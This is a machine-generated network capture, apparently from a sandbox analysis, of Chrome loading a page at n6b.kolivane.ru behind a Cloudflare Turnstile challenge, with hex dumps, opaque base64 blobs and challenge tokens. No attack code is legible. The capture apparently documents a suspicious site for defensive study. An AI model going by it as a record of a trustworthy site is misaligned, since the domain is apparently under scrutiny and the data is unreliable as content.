                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 70 71 65 45 65 4e 67 47 53 4f 5a 5a 61 44 5a 6c 4f 44 56 35 64 58 63 70 74 67 56 34 70 63 6a 56 39 34 59 49 69 56 64 6d 4b 66 64 33 36 69 6b 5a 47 4e 67 4a 32 75 64 49 31 71 6b 34 75 53 6a 34 71 66 73 5a 61 58 6a 35 6a 45 6b 37 79 35 68 70 32 30 6d 59 4f 47 6d 4c 32 6f 78 71 6a 42 72 36 69 4f 77 34 36 57 72 64 72 54 73 4e 53 31 74 4f 43 38 75 39 53 78 34 74 72 6c 6e 2b 4c 61 36 63 48 47 33 36 2b 37 71 4d 37 66 79 38 33 6f 74 39 66 56 35 2f 7a 50 41 4e 62 37 32 51 4c 58 38 2f 58 43 31 51 6f 46 42 50 72 67 2b 76 6e 48 35 41 73 41 33 4e 44 39 42 74 55 48 2b 64 58 32 44 50 50 63 41 64 33 67 43 78 48 34 2b 66 73 6a 42 78 55 64 42 68 77 57 36 43 4c 76 49 41 45 4b 44 43 38 49 4b 69 51 47 41 2f 4d 30 47 77 6f 35 2b 68 38 7a 4d 78 6b 53 4a 44 55 79 50 67 63 36 4c
                                                                                                    Data Ascii: pqeEeNgGSOZZaDZlODV5dXcptgV4pcjV94YIiVdmKfd36ikZGNgJ2udI1qk4uSj4qfsZaXj5jEk7y5hp20mYOGmL2oxqjBr6iOw46WrdrTsNS1tOC8u9Sx4trln+La6cHG36+7qM7fy83ot9fV5/zPANb72QLX8/XC1QoFBPrg+vnH5AsA3ND9BtUH+dX2DPPcAd3gCxH4+fsjBxUdBhwW6CLvIAEKDC8IKiQGA/M0Gwo5+h8zMxkSJDUyPgc6L
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 54 63 32 68 71 62 6d 5a 69 63 58 4a 73 58 4a 5a 5a 6c 49 71 67 63 36 52 37 5a 34 4f 52 6e 4a 75 6d 72 6d 68 6d 62 49 4b 41 6e 34 65 31 64 61 57 48 64 58 69 4d 62 72 36 63 6c 4d 47 31 73 62 4b 33 78 62 2b 79 70 34 54 4a 69 4a 53 58 79 37 43 4c 6f 63 57 79 78 36 32 68 72 62 50 43 71 38 36 74 7a 61 32 58 74 64 6d 69 7a 35 33 6b 7a 37 62 57 70 64 6d 37 35 4d 58 58 76 71 72 44 76 4c 44 69 35 65 4c 46 7a 39 72 72 72 63 37 38 32 72 62 52 34 62 54 6a 34 62 33 79 35 39 4d 48 78 2f 55 41 34 75 77 47 79 77 37 4f 79 75 6b 54 38 51 49 42 37 41 73 46 47 4e 76 38 36 67 6f 66 38 42 44 62 35 51 4d 45 2f 43 50 71 34 76 62 35 41 67 7a 39 44 78 49 46 43 7a 55 31 39 67 55 30 47 66 54 37 39 54 51 74 4e 54 34 50 4d 68 51 44 4f 54 4d 44 43 76 77 34 47 77 63 6c 50 77 34 76 42 53
                                                                                                    Data Ascii: Tc2hqbmZicXJsXJZZlIqgc6R7Z4ORnJumrmhmbIKAn4e1daWHdXiMbr6clMG1sbK3xb+yp4TJiJSXy7CLocWyx62hrbPCq86tza2Xtdmiz53kz7bWpdm75MXXvqrDvLDi5eLFz9rrrc782rbR4bTj4b3y59MHx/UA4uwGyw7OyukT8QIB7AsFGNv86gof8BDb5QME/CPq4vb5Agz9DxIFCzU19gU0GfT79TQtNT4PMhQDOTMDCvw4GwclPw4vBS
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 57 55 35 54 58 47 64 34 62 49 43 56 66 70 46 6c 70 4a 6c 79 68 59 69 67 6f 61 75 72 65 70 36 79 5a 61 39 75 71 61 69 50 74 49 61 4f 71 6f 6c 38 6b 35 65 41 64 4c 4f 31 6c 4d 65 30 6c 62 75 66 68 62 2b 2b 72 6f 61 77 72 4b 2f 54 6a 61 7a 56 74 6f 36 57 79 37 69 70 6c 4d 75 52 7a 39 71 65 72 4c 44 46 74 71 2b 36 34 63 6e 58 77 74 72 65 71 73 62 6d 35 61 36 2f 34 38 7a 66 36 72 44 56 32 4f 66 6d 31 64 44 39 75 62 33 66 37 4e 48 33 2f 51 6e 45 36 39 77 4f 34 41 54 75 44 63 33 72 7a 52 54 78 41 4f 73 4b 34 75 2f 7a 44 75 37 33 33 39 63 57 44 67 48 37 35 42 72 38 49 43 59 47 36 2f 62 71 4b 50 6f 46 44 66 30 72 4a 53 77 77 4c 51 59 6f 4c 52 4c 75 48 66 6a 32 2f 42 63 52 4d 42 67 77 47 50 34 71 48 78 4d 5a 50 77 34 70 43 30 78 50 50 6a 55 76 4a 41 34 4b 53 68 4e
                                                                                                    Data Ascii: WU5TXGd4bICVfpFlpJlyhYigoaurep6yZa9uqaiPtIaOqol8k5eAdLO1lMe0lbufhb++roawrK/TjazVto6Wy7iplMuRz9qerLDFtq+64cnXwtreqsbm5a6/48zf6rDV2Ofm1dD9ub3f7NH3/QnE69wO4ATuDc3rzRTxAOsK4u/zDu7339cWDgH75Br8ICYG6/bqKPoFDf0rJSwwLQYoLRLuHfj2/BcRMBgwGP4qHxMZPw4pC0xPPjUvJA4KShN
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 6e 53 64 58 71 4a 34 70 32 61 61 64 36 57 6c 5a 71 79 74 6b 4a 70 39 72 6e 4f 49 66 37 65 79 72 6f 79 31 64 72 71 51 74 36 43 55 72 5a 57 57 6b 71 43 6c 6f 4a 54 48 6c 4b 53 59 67 4a 66 43 69 63 65 6a 30 74 44 53 70 4b 76 47 6f 37 44 56 32 62 75 62 6e 74 58 68 30 4c 54 47 35 39 33 69 6f 2b 53 35 78 5a 2b 33 36 4c 76 49 71 76 47 78 38 63 6a 71 37 38 4b 77 73 38 66 50 74 65 6e 30 33 66 33 41 32 51 54 51 34 50 72 71 36 4f 58 59 41 4f 66 73 42 52 41 53 35 73 59 51 35 76 54 79 36 76 72 32 31 41 77 4f 36 66 77 4c 31 4f 4c 6b 4a 68 6a 31 42 77 4d 54 4a 43 54 36 48 4f 6b 4a 41 4f 76 38 49 54 55 67 47 51 62 78 4c 78 6a 30 4b 41 63 34 4f 45 49 2f 4c 54 51 37 49 44 5a 42 47 7a 73 74 42 6b 64 4e 43 51 4d 78 56 43 6f 50 4a 53 49 59 52 68 49 37 50 53 73 75 58 6a 46 62
                                                                                                    Data Ascii: nSdXqJ4p2aad6WlZqytkJp9rnOIf7eyroy1drqQt6CUrZWWkqCloJTHlKSYgJfCicej0tDSpKvGo7DV2bubntXh0LTG593io+S5xZ+36LvIqvGx8cjq78Kws8fPten03f3A2QTQ4Prq6OXYAOfsBRAS5sYQ5vTy6vr21AwO6fwL1OLkJhj1BwMTJCT6HOkJAOv8ITUgGQbxLxj0KAc4OEI/LTQ7IDZBGzstBkdNCQMxVCoPJSIYRhI7PSsuXjFb
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 35 68 70 34 65 4e 58 34 43 72 6d 6f 4e 73 73 59 65 44 64 71 36 6d 6f 72 47 44 70 71 75 73 74 5a 6d 37 67 71 74 2b 73 70 68 2f 68 38 71 32 67 38 61 4c 71 59 6d 37 77 4d 71 39 77 4b 71 4f 78 71 2f 45 6f 39 61 6b 6a 39 32 56 6b 73 79 73 77 71 2f 47 77 62 50 45 35 4c 61 31 76 36 6e 65 79 63 6e 4b 34 61 33 67 34 65 44 48 78 2b 47 77 2b 4e 4b 38 78 76 44 58 34 66 6a 2b 2f 75 4c 45 78 50 37 53 38 38 6a 74 33 52 44 4f 42 78 49 48 35 4d 34 56 7a 39 4d 45 30 2b 6b 62 33 42 4d 49 32 51 41 57 33 42 54 33 33 76 66 30 47 69 59 57 36 67 51 71 47 4f 37 6f 49 53 38 41 4a 43 30 31 41 67 6f 56 47 44 76 75 43 52 6a 39 4e 6a 76 38 4d 79 51 77 50 69 41 52 43 52 73 59 4a 55 51 75 48 46 46 54 54 51 6f 48 51 30 63 76 55 6c 55 6b 47 78 77 38 57 56 5a 5a 4c 45 78 59 49 6b 42 41 5a
                                                                                                    Data Ascii: 5hp4eNX4CrmoNssYeDdq6morGDpqustZm7gqt+sph/h8q2g8aLqYm7wMq9wKqOxq/Eo9akj92Vksyswq/GwbPE5La1v6neycnK4a3g4eDHx+Gw+NK8xvDX4fj+/uLExP7S88jt3RDOBxIH5M4Vz9ME0+kb3BMI2QAW3BT33vf0GiYW6gQqGO7oIS8AJC01AgoVGDvuCRj9Njv8MyQwPiARCRsYJUQuHFFTTQoHQ0cvUlUkGxw8WVZZLExYIkBAZ
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 77 71 32 71 74 67 49 75 53 63 6d 6d 49 6d 70 43 77 6a 5a 79 4d 76 4b 71 62 67 4c 79 2b 6c 36 65 41 69 4a 53 71 69 72 57 70 68 63 66 48 6f 73 43 76 30 71 44 56 69 61 43 77 32 70 48 4a 79 70 6d 6e 79 62 32 76 71 39 61 32 31 4d 62 46 78 74 6a 48 33 62 72 67 7a 73 37 47 35 4d 2f 52 35 4f 48 59 36 73 72 6d 32 74 6e 53 38 4e 69 34 31 64 76 62 41 38 2f 37 32 74 72 43 44 4c 33 44 42 77 33 77 44 51 62 52 44 67 77 4b 35 67 76 57 44 39 6e 31 43 68 72 6e 2f 51 72 71 37 53 4c 57 49 52 44 39 4b 69 6f 49 49 39 37 6a 45 4f 66 69 4a 79 66 72 49 79 63 32 49 41 37 34 46 51 6f 76 2f 51 30 5a 4d 54 55 52 47 7a 63 59 42 55 41 6e 4a 42 78 45 52 53 67 4e 4d 53 31 4d 4a 67 30 56 52 6a 64 45 54 79 39 55 53 46 46 4f 4c 6b 31 58 4e 79 4e 52 57 56 49 78 56 69 4e 71 53 31 73 39 51 32
                                                                                                    Data Ascii: wq2qtgIuScmmImpCwjZyMvKqbgLy+l6eAiJSqirWphcfHosCv0qDViaCw2pHJypmnyb2vq9a21MbFxtjH3brgzs7G5M/R5OHY6srm2tnS8Ni41dvbA8/72trCDL3DBw3wDQbRDgwK5gvWD9n1Chrn/Qrq7SLWIRD9KioII97jEOfiJyfrIyc2IA74FQov/Q0ZMTURGzcYBUAnJBxERSgNMS1MJg0VRjdETy9USFFOLk1XNyNRWVIxViNqS1s9Q2
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 69 6f 65 44 70 72 47 45 75 48 75 76 71 58 61 69 75 48 36 4e 6c 62 6d 62 75 59 6a 43 6f 4b 69 56 78 36 47 71 78 38 2b 65 6c 49 76 49 7a 71 69 36 6c 4d 53 58 76 70 58 52 6d 37 4b 63 30 63 53 32 35 39 54 64 31 62 4c 69 75 39 79 6f 32 64 44 43 37 64 33 64 79 2b 57 7a 36 74 6a 45 30 76 33 77 76 67 44 50 31 50 54 44 77 63 4b 2b 39 2b 6b 43 33 66 72 49 44 75 48 37 42 2f 33 6d 42 63 38 43 38 67 48 35 45 75 6b 4e 37 4d 2f 78 45 78 67 69 47 50 45 56 49 41 67 65 35 52 55 62 34 77 30 68 48 75 34 4b 2f 69 73 54 36 75 30 4d 4a 76 4d 5a 50 50 51 52 4d 2f 73 77 49 43 73 75 44 77 38 66 48 42 34 55 4f 45 77 69 47 52 68 4e 49 79 77 2f 4d 53 45 4d 56 43 46 41 4d 52 6b 38 58 54 59 56 52 7a 35 53 55 54 41 33 51 46 52 66 51 6b 52 70 4f 45 4a 75 62 47 5a 49 50 55 34 6c 55 6d 64
                                                                                                    Data Ascii: ioeDprGEuHuvqXaiuH6NlbmbuYjCoKiVx6Gqx8+elIvIzqi6lMSXvpXRm7Kc0cS259Td1bLiu9yo2dDC7d3dy+Wz6tjE0v3wvgDP1PTDwcK+9+kC3frIDuH7B/3mBc8C8gH5EukN7M/xExgiGPEVIAge5RUb4w0hHu4K/isT6u0MJvMZPPQRM/swICsuDw8fHB4UOEwiGRhNIyw/MSEMVCFAMRk8XTYVRz5SUTA3QFRfQkRpOEJubGZIPU4lUmd
                                                                                                    2024-12-23 18:11:50 UTC1369INData Raw: 61 6c 31 76 49 6d 66 6f 35 47 57 70 63 4b 30 6c 37 57 45 68 4c 69 6f 6f 6f 69 36 76 63 69 4e 77 4c 44 43 6b 63 4c 4b 79 5a 65 78 32 5a 69 61 6b 72 79 34 6e 63 2b 34 76 4e 65 37 70 61 62 6f 74 39 6d 70 37 62 37 69 32 2b 4c 65 74 66 50 4f 2b 64 48 6e 79 75 76 76 33 37 37 61 30 64 66 50 34 4f 33 35 41 67 44 49 36 75 59 48 36 75 48 5a 30 41 2f 69 41 4d 33 53 34 51 54 6d 30 75 51 4c 37 50 4d 4d 44 53 45 4d 41 75 50 57 38 42 34 45 34 76 34 57 43 75 66 6c 2b 41 55 41 45 4f 37 2b 42 77 73 56 46 79 67 4f 42 51 51 35 39 41 6e 78 4d 66 35 41 51 79 45 32 4f 6a 39 42 4f 44 67 34 4b 77 34 6d 52 51 34 74 52 56 4e 4f 51 6c 52 58 55 6a 55 32 57 6c 5a 4c 4b 46 35 61 4f 42 56 66 4a 44 46 5a 5a 44 78 57 61 6d 70 6c 4a 32 35 61 49 30 42 6e 50 57 74 4a 4c 53 70 55 4d 55 70 51
                                                                                                    Data Ascii: al1vImfo5GWpcK0l7WEhLioooi6vciNwLDCkcLKyZex2Ziakry4nc+4vNe7pabot9mp7b7i2+LetfPO+dHnyuvv377a0dfP4O35AgDI6uYH6uHZ0A/iAM3S4QTm0uQL7PMMDSEMAuPW8B4E4v4WCufl+AUAEO7+BwsVFygOBQQ59AnxMf5AQyE2Oj9BODg4Kw4mRQ4tRVNOQlRXUjU2WlZLKF5aOBVfJDFZZDxWamplJ25aI0BnPWtJLSpUMUpQ


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.54973735.190.80.14434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:50 UTC534OUTOPTIONS /report/v4?s=Rl4SCA2DgqObEAwkj5k9HaCD8EW8bHJ3xyOFNTqDT%2FNg9JQ%2Bor16T2JwBe9kyrBUbCv%2FLpc56GGESLnoFo1betBslpfCZl7rdJ2tZra7ks274WpHMjHVziqSc53KkQ%3D%3D HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://n6b.kolivane.ru
                                                                                                    Access-Control-Request-Method: POST
                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:50 UTC336INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    access-control-max-age: 86400
                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                    access-control-allow-origin: *
                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                    date: Mon, 23 Dec 2024 18:11:50 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.54974035.190.80.14434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:51 UTC476OUTPOST /report/v4?s=Rl4SCA2DgqObEAwkj5k9HaCD8EW8bHJ3xyOFNTqDT%2FNg9JQ%2Bor16T2JwBe9kyrBUbCv%2FLpc56GGESLnoFo1betBslpfCZl7rdJ2tZra7ks274WpHMjHVziqSc53KkQ%3D%3D HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 429
                                                                                                    Content-Type: application/reports+json
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:51 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 36 62 2e 6b 6f 6c 69 76 61 6e 65 2e 72 75 2f 64 61 34 73 63 6d 51 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 33 2e 31 33 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":332,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://n6b.kolivane.ru/da4scmQ/","sampling_fraction":1.0,"server_ip":"172.67.143.137","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                    2024-12-23 18:11:52 UTC168INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    date: Mon, 23 Dec 2024 18:11:51 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.549743104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:52 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:52 UTC379INHTTP/1.1 404 Not Found
                                                                                                    Date: Mon, 23 Dec 2024 18:11:52 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 7
                                                                                                    Connection: close
                                                                                                    cf-chl-out: oOMPL5WgXZJXEaHVofPqb3lqu0BUc6fKFW4=$qxMh8OwKyCjf5eS4
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a510e1bfe19a1-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                    Data Ascii: invalid


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.549744104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:52 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7g HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:53 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:52 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a510f3f8943f8-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 57 08 02 00 00 00 8b 27 f2 98 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDRW'IDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.549753104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:54 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7g HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:54 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:54 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a5119cded18ea-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 57 08 02 00 00 00 8b 27 f2 98 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDRW'IDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.549758104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:55 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f6a50df68a942a0/1734977510149/7a7c9221e414bb907990faf400801d9af55b752240b1e78d2b1126445bca29d8/zSGry-N1tCBz7IV HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: max-age=0
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:55 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                    Date: Mon, 23 Dec 2024 18:11:55 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 1
                                                                                                    Connection: close
                                                                                                    2024-12-23 18:11:55 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 65 6e 79 53 49 65 51 55 75 35 42 35 6b 50 72 30 41 49 41 64 6d 76 56 62 64 53 4a 41 73 65 65 4e 4b 78 45 6d 52 46 76 4b 4b 64 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20genySIeQUu5B5kPr0AIAdmvVbdSJAseeNKxEmRFvKKdgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                    2024-12-23 18:11:55 UTC1INData Raw: 4a
                                                                                                    Data Ascii: J


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.549765104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:56 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 31283
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
